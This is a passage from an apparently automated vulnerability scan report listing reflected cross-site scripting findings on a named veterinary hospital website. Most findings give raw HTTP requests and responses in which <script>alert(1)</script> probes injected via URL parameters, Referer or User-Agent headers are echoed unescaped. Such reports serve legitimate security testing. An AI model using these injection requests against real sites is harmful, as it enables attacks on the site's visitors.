GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Moz
illa%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)fc9a7"><script>alert(1)</script>a58880500cd HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:48:33 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=njd61do981s3a37nqrprgfios7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23515 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... 252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)fc9a7"><script>alert(1)</script>a58880500cd " />...[SNIP]...
2.121. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /plymouth/appt.html
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd10"><a>af94765ca4d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /plymouth/appt.htmlfbd10"><a>af94765ca4d HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Mar 2011 12:47:20 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Content-Type: text/html Content-Length: 9907 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <body id="apptfbd10"><a>af94765ca4d ">...[SNIP]...
2.122. http://www.vcahospitals.com/plymouth/appt.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /plymouth/appt.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b638a"><script>alert(1)</script>3e858d70063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /plymouth/appt.html?b638a"><script>alert(1)</script>3e858d70063 =1 HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:46:53 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 22006 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/plymouth/appt.html?b638a"><script>alert(1)</script>3e858d70063 =1" />...[SNIP]...
2.123. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /plymouth/more/boarding.html
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 657cd"><a>2035dd31204 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /plymouth/more657cd"><a>2035dd31204 /boarding.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/plymouth/appt.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Mar 2011 12:47:36 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Content-Type: text/html Content-Length: 9907 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <body id="more657cd"><a>2035dd31204 ">...[SNIP]...
2.124. http://www.vcahospitals.com/hanson/appt.html [Referer HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/appt.html
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a275f"><script>alert(1)</script>50189f95eed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /hanson/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=a275f"><script>alert(1)</script>50189f95eed Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:32 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 20916 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=a275f"><script>alert(1)</script>50189f95eed " />...[SNIP]...
2.125. http://www.vcahospitals.com/hanson/appt.html [User-Agent HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/appt.html
Issue detail
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aeba"><script>alert(1)</script>f4116ac98b0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /hanson/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/hanson Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.131aeba"><script>alert(1)</script>f4116ac98b0 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:28 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 20913 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.131aeba"><script>alert(1)</script>f4116ac98b0 " />...[SNIP]...
2.126. http://www.vcahospitals.com/main/offer [Referer HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57e77"><script>alert(1)</script>8105a26b689 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=57e77"><script>alert(1)</script>8105a26b689
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:05:06 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=qur1s877iqte90hbj289vogdv5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 10821 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=57e77"><script>alert(1)</script>8105a26b689 " />...[SNIP]...
2.127. http://www.vcahospitals.com/main/offer [User-Agent HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93282"><script>alert(1)</script>5b7938f8052 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.1393282"><script>alert(1)</script>5b7938f8052 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:05:02 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=psqbs3kc8ulu01cr19pld79dp0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 10784 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.1393282"><script>alert(1)</script>5b7938f8052 " />...[SNIP]...
2.128. http://www.vcahospitals.com/main/offer/ [Referer HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9378"><script>alert(1)</script>0a72e423827 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /main/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1 Referer: http://www.google.com/search?hl=en&q=d9378"><script>alert(1)</script>0a72e423827 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:38 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14608 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=d9378"><script>alert(1)</script>0a72e423827 " />...[SNIP]...
2.129. http://www.vcahospitals.com/main/offer/ [User-Agent HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8614f"><script>alert(1)</script>cee15d78e68 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /main/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)8614f"><script>alert(1)</script>cee15d78e68 Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:31 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14625 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)8614f"><script>alert(1)</script>cee15d78e68 " />...[SNIP]...
2.130. http://www.vcahospitals.com/main/offer/thank-you.html [Referer HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/thank-you.html
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95362"><script>alert(1)</script>05c6e8d8221 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
POST /main/offer/thank-you.html? HTTP/1.1 Referer: http://www.google.com/search?hl=en&q=95362"><script>alert(1)</script>05c6e8d8221 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Content-Length: 448 fname=&lname=&addr=&city=&state&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D35...[SNIP]...
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:24:55 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 3534 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <a href="http://www.google.com/search?hl=en&q=95362"><script>alert(1)</script>05c6e8d8221 &&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284">...[SNIP]...
2.131. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [Referer HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /manhattan-veterinary-group/appt.html
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db8d4"><script>alert(1)</script>1f48bc76e1e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /manhattan-veterinary-group/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665 Referer: http://www.google.com/search?hl=en&q=db8d4"><script>alert(1)</script>1f48bc76e1e
Response
